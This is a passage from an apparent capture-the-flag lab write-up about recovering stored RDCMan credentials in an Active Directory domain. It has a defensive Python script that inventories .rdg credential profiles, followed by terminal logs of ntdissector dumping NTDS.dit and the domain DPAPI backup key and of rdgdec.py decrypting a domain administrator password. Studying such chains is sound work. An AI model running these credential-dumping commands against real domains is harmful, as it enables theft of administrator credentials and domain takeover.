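Before any decryption, a defender's first question is simply which .rdg files on the file shares hold stored credentials and for which accounts. As an added example (not part of the original write-up or of the RDCMan/dpapilab projects), the Python below parses an RDCMan file, lists every credential profile it finds, and checks whether each password value carries the DPAPI blob header (version 1 followed by the provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb). The sample .rdg is constructed to mirror jenkins.rdg above; its password is a fabricated blob with a valid header and a zeroed body, not a real ciphertext.

```python
import base64
import uuid
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Every DPAPI CryptProtectData blob starts with a 4-byte version (1) followed by
# the provider GUID below in little-endian ("bytes_le") layout.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def _fake_dpapi_blob() -> bytes:
    # Constructed placeholder: a valid DPAPI header with a zeroed body, NOT real ciphertext.
    return (1).to_bytes(4, "little") + DPAPI_PROVIDER.bytes_le + b"\x00" * 16


# Constructed .rdg modelled on the jenkins.rdg shown above; the password is the fake blob.
SAMPLE_RDG = f"""<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\\administrator</profileName>
        <userName>administrator</userName>
        <password>{base64.b64encode(_fake_dpapi_blob()).decode()}</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties><name>jenkins</name></properties>
    <server>
      <properties><name>dc1.klendathu.vl</name></properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
</RDCMan>
"""


@dataclass
class StoredCredential:
    profile: str
    user: str
    domain: str
    protection: str  # "dpapi", "empty" or "unknown"


def classify_password(b64: str) -> str:
    """Identify a DPAPI blob by its header without needing any key material."""
    if not b64:
        return "empty"
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "unknown"
    if len(blob) >= 20 and blob[:4] == b"\x01\x00\x00\x00" and uuid.UUID(bytes_le=blob[4:20]) == DPAPI_PROVIDER:
        return "dpapi"
    return "unknown"


def inventory_rdg(xml_text: str) -> List[StoredCredential]:
    """List every credential profile stored in an RDCMan file."""
    root = ET.fromstring(xml_text)
    creds: List[StoredCredential] = []
    # Profiles live under credentialsProfiles; logonCredentials blocks may also embed one inline.
    for node in list(root.iter("credentialsProfile")) + list(root.iter("logonCredentials")):
        user = node.findtext("userName")
        if user is None:
            continue  # a logonCredentials that only references a profile carries no secret
        creds.append(StoredCredential(
            profile=node.findtext("profileName", ""),
            user=user,
            domain=node.findtext("domain", ""),
            protection=classify_password(node.findtext("password", "")),
        ))
    return creds


def target_servers(xml_text: str) -> List[str]:
    """Hosts the stored credentials would be used against."""
    root = ET.fromstring(xml_text)
    return [name.text for srv in root.iter("server") for name in srv.findall("properties/name")]


if __name__ == "__main__":
    for c in inventory_rdg(SAMPLE_RDG):
        print(f"{c.profile}: {c.domain}\\{c.user} ({c.protection})")
    print("servers:", target_servers(SAMPLE_RDG))
```

The inventory tells you what exposure a leaked .rdg plus its master keys represents (here: the domain administrator password for dc1) and therefore which account to rotate; a DPAPI-protected value is only as safe as the user's master keys and the domain backup key, both of which this chain obtained.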


puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR]
                   [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent]
                   [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help            show this help message and exit
  -V, --version         Display version info

Examples:

> Dump users, groups and domain backup keys
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret

> Dump all records from the database
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all

> Dump user objects and include deleted records
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel

> List object classes available to filter records
$ ntdissector -ntds NTDS.dit  -filters
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/test -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes :  ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$


(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$

rdgdecrypt

(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key
[+] Profile:  KLENDATHU\administrator
    Username: administrator
    Domain:   KLENDATHU
    Password: @@M<redacted>s@@
-------------------------------------------------------------------------------
[+] Decrypted 1 out of 1 credentials

What a ride!

Used links:

https://github.com/ar0x4/impacket.git

https://github.com/synacktiv/ntdissector

https://github.com/tijldeneut/dpapilab-ng
